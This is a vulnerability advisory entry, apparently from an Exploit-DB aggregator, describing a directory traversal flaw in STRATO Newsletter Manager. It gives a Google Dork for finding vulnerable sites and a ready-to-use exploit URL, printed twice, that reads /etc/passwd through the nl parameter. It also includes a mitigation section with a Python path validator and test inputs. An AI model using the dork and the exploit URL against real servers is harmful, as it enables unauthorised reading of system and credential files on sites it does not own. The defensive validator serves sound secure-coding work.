Vendor: STRATO Newsletter Manager
By: Zero X
CVSS: 8.8 (HIGH)
Type: Directory Traversal
CWE: 22
Product Name: STRATO Newsletter Manager
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: None
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

STRATO Newsletter Manager is vulnerable to Directory Traversal

STRATO Newsletter Manager is vulnerable to a directory traversal attack. An attacker can use the Google Dork 'inurl:"newsletter.php.cgi"' to find vulnerable websites. The exploit is a URL with the following structure:

http://server/cgi-bin/newsletter.php.cgi?PHPSESSID=af92ed633ae0d06d1e24d22520f709f7&action=nl_show&nl=../../../../../../../../../../../../../../etc/passwd

The nl parameter carries a chain of ../ sequences followed by the target path, so this URL can be used to access sensitive files on the server, such as the /etc/passwd file.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the web application is properly configured to prevent directory traversal attacks. This can be done by restricting access to sensitive files and directories, and by validating user input to ensure that it does not contain malicious characters.
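
One way to validate the nl parameter described above, as an added example that is not part of the original entry or the vendor's code: resolve the requested name under a fixed newsletter directory and reject anything that lands outside it. The function names, the directory layout and the sample inputs are assumptions constructed for illustration.

```python
import os
import tempfile

class TraversalError(ValueError):
    """Raised when a requested newsletter name escapes the base directory."""

def resolve_newsletter(base_dir: str, nl: str) -> str:
    """Map the `nl` request parameter to a file inside base_dir, or raise."""
    if not nl or "\x00" in nl:
        raise TraversalError("empty name or NUL byte")
    base = os.path.realpath(base_dir)
    # realpath collapses ".." segments and follows symlinks, so the check
    # below sees the file that would really be opened.
    candidate = os.path.realpath(os.path.join(base, nl))
    # commonpath compares whole path components, so a sibling such as
    # "<base>_old" is not mistaken for being inside "<base>".
    if os.path.commonpath([base, candidate]) != base:
        raise TraversalError(f"{nl!r} resolves outside {base}")
    if not os.path.isfile(candidate):
        raise TraversalError(f"{nl!r} is not a regular file")
    return candidate

def demo() -> dict:
    """Run the check on constructed inputs; True means the name was accepted."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "newsletters")      # hypothetical layout
        os.makedirs(os.path.join(base, "2020"))
        os.makedirs(base + "_old")
        for path in (os.path.join(base, "2020", "may.txt"),
                     os.path.join(base + "_old", "draft.txt")):
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
        samples = [
            "2020/may.txt",                  # legitimate newsletter
            "../" * 14 + "etc/passwd",       # same shape as the entry's request
            "/etc/passwd",                   # absolute path replaces the base
            "../newsletters_old/draft.txt",  # sibling sharing the name prefix
            "2020/../2020/may.txt",          # ".." that stays inside the base
        ]
        for nl in samples:
            try:
                resolve_newsletter(base, nl)
                results[nl] = True
            except TraversalError:
                results[nl] = False
    return results

if __name__ == "__main__":
    print(demo())
```

The check runs on the value after the web server has URL-decoded it, and the file is opened using the returned path rather than the raw parameter.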

Exploit-DB raw data:

STRATO Newsletter Manager is vulnerable against Directory Traversal

Vendor: www.strato-cgi.de

Google Dork: inurl:"newsletter.php.cgi"


Exploit:

http://server/cgi-bin/newsletter.php.cgi?PHPSESSID=af92ed633ae0d06d1e24d22520f709f7&action=nl_show&nl=../../../../../../../../../../../../../../etc/passwd

Greetz Zero X